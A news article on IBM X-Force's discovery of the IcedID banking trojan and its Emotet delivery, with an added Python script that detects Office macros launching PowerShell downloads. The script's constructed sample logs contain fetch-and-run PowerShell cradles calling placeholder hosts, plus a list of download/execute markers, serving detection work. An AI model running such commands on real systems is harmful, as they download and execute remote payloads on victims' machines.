IcedID Banking Trojan Redirects Users to Fake Sites, IBM Reports


IBM researchers have discovered a new banking trojan that is built from custom code, though it uses tactics similar to those of existing malware.


A new banking trojan is taking aim at financial institutions. It has been dubbed “IcedID” by the IBM X-Force research team that first discovered it.

IcedID relies on an existing malware dropper, Emotet, to gain an initial foothold on the victim’s system. Once delivered, the IcedID payload redirects victims to an attacker-controlled site built as a replica of the real banking website. The IcedID campaigns have targeted banks, payment card providers and e-commerce sites in the US, Canada and the UK.

“IBM X-Force monitors close to 300 million protected endpoints across the globe, detecting and mapping threat evolution close to real-time,” Limor Kessem, Executive Security Advisor, IBM Security, told eWEEK. “X-Force research detected and analyzed IcedID as soon as it was identified in attempts to infect end users.”

It is not entirely clear how many victims IcedID has claimed or how widely the trojan has been distributed to date. Kessem noted that X-Force detected IcedID very early after its launch and that, so far, the campaigns are still small, with a limited number of infections. She added that by using Emotet as the distribution mechanism, IcedID’s authors have also tried to keep the malware under the radar, and explained that Emotet itself is usually delivered via malware spam (malspam), often concealed in productivity file attachments.

“After the user is first infected with Emotet, the latter is used as a covert tunnel through which other malware is delivered and executed on the endpoint,” Kessem said. “Aside from newly dropping IcedID, Emotet is known for its connection with a variety of malicious codes, most recently the QakBot banking Trojan that targets business banking in North America.”


Among IcedID’s core capabilities is redirecting victims to an attacker-controlled site. Kessem explained that instead of using web injections on the bank’s site, IcedID takes the victim to a page served from its own server, where it can interact with the victim away from the bank’s control. She added that the redirection pages are often very hard for regular users to identify.

“Redirection attacks are malware-facilitated operations in which the bank’s genuine site is an unwilling participant,” Kessem said. “The malware keeps a live connection to the genuine site and manipulates the fake session in a way that has it present the bank’s true URL in the address bar.”

IcedID does not itself exploit user systems; it is delivered onto an endpoint that has already been compromised by the Emotet dropper.

“To gain the initial foothold, Emotet uses malicious JavaScript in file macros in order to invoke a PowerShell script to fetch the payload from a remote server,” Kessem said. “This process is initiated by unwitting users who are tricked into opening email attachments that carry concealed malcode.”
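The delivery chain Kessem describes, an Office document’s macro launching PowerShell to fetch a payload from a remote server, is also what a defender can hunt for in endpoint telemetry. The following Python script is an added example, not code from IBM X-Force or from this article: it runs a parent/child-process heuristic over a handful of constructed log lines laid out like Sysmon process-creation events, and it decodes -EncodedCommand arguments so that base64-wrapped download cradles are inspected as well. The field names, the marker list, the parent/child process lists and the sample log lines are all this example’s assumptions, not a published Emotet or IcedID signature.

```python
"""Detect the Office-macro -> script-host -> remote-download chain in process-creation logs.

Added example; not IBM X-Force code and not a published Emotet/IcedID rule. The log lines
are constructed, flattened key=value records laid out like Sysmon Event ID 1; field names
and the heuristics below are this example's assumptions.
"""
import base64
import ntpath
import re

# Parent/child pairs that make a process-creation event interesting (assumed lists).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
# -EncodedCommand and its usual abbreviations; the argument is base64 over UTF-16LE text.
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.I)
# Download / in-memory execution primitives typical of macro-launched stagers.
MARKER_RE = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|net\.webclient|"
    r"bitsadmin|start-bitstransfer|invoke-expression|iex)\b", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def parse_event(line):
    """Parse one flattened key=value log line into a dict (quoted values may contain spaces)."""
    return {key: quoted or bare for key, quoted, bare in FIELD_RE.findall(line)}


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return a finding dict when an Office process spawned a script host, else None."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return None
    cmd = event.get("CommandLine", "")
    reasons = [f"{parent} spawned {child}"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
    # Inspect the decoded text plus the command line minus the base64 blob, so that
    # random base64 characters cannot produce accidental marker hits.
    text = ENCODED_FLAG.sub(" ", cmd) + " " + (decoded or "")
    markers = sorted({m.lower() for m in MARKER_RE.findall(text)})
    if markers:
        reasons.append("download/execute markers: " + ", ".join(markers))
    return {"time": event.get("UtcTime"), "host": event.get("Computer"),
            "severity": "high" if markers else "medium", "reasons": reasons,
            "markers": markers, "urls": URL_RE.findall(text), "decoded": decoded}


def scan(lines):
    """Run analyze_event over every non-empty line; findings come back in log order."""
    return [f for f in (analyze_event(parse_event(l)) for l in lines if l.strip()) if f]


def encode_ps(command):
    """Encode as PowerShell's -EncodedCommand expects (used here only to build the sample log)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not real logs; hostnames use the reserved .invalid TLD.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://stage2.example.invalid/a.ps1')"
SAMPLE_LOG = [
    # Word -> powershell with a base64-wrapped download cradle
    'EventID=1 UtcTime="2017-11-13 09:14:22" Computer=WS01 '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" '
    'CommandLine="powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand ' + encode_ps(_STAGER) + '"',
    # Excel -> cmd -> powershell with a plaintext download-and-run
    'EventID=1 UtcTime="2017-11-13 10:02:41" Computer=WS02 Image="C:\\Windows\\System32\\cmd.exe" '
    'ParentImage="C:\\Program Files (x86)\\Microsoft Office\\Office15\\EXCEL.EXE" '
    'CommandLine="cmd.exe /c powershell -w hidden (New-Object Net.WebClient).DownloadFile('
    '\'http://stage2.example.invalid/u.exe\',\'%TEMP%\\u.exe\'); start %TEMP%\\u.exe"',
    # Benign: an administrator running PowerShell from Explorer
    'EventID=1 UtcTime="2017-11-13 10:30:05" Computer=WS01 '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Windows\\explorer.exe" CommandLine="powershell.exe -NoProfile -Command Get-Process"',
    # Benign: Word spawning the print-spooler helper
    'EventID=1 UtcTime="2017-11-13 10:41:17" Computer=WS01 Image="C:\\Windows\\splwow64.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE" '
    'CommandLine="C:\\Windows\\splwow64.exe 12288"',
    # Outlook -> encoded PowerShell with harmless content: worth a look, but no download markers
    'EventID=1 UtcTime="2017-11-13 11:05:59" Computer=WS03 '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'ParentImage="C:\\Program Files\\Microsoft Office\\Office16\\OUTLOOK.EXE" '
    'CommandLine="powershell.exe -NonInteractive -enc ' + encode_ps("Get-Date") + '"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["time"], finding["host"], finding["severity"].upper(), "; ".join(finding["reasons"]))
        for url in finding["urls"]:
            print("    stage-2 URL:", url)
```

Run as a script, it prints the two high-severity findings with their stage-2 URLs and the medium one for the encoded but harmless Outlook-launched command. In real telemetry the parent/child lists need tuning to the environment, and a direct parent check misses macros that launch the script host indirectly (for example through WMI, where the parent becomes WmiPrvSE.exe), so the encoded-command and marker checks are worth running on every PowerShell launch, not only on those with an Office parent.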

Though IcedID uses tactics seen in other banking trojans before, IBM X-Force’s analysis found that IcedID is custom code. From an attribution perspective, it is not entirely clear where IcedID comes from or who wrote it. Kessem warned that in cyber-crime activity, attribution is often a tricky concept, as malware can be operated by different groups or sub-groups, or be sold and shared. That said, IBM X-Force researchers do have some suspicions.

“According to an analysis of IcedID’s infrastructure, the malware’s main servers are hosted in Russia,” Kessem said. “Judging by the company it keeps, IcedID is delivered by the same group that delivers QakBot and Dridex, both of which are also known to come from Russian-speaking regions.”

Sean Michael Kerner is a senior editor at eWEEK. Follow him on Twitter @TechJournalist.

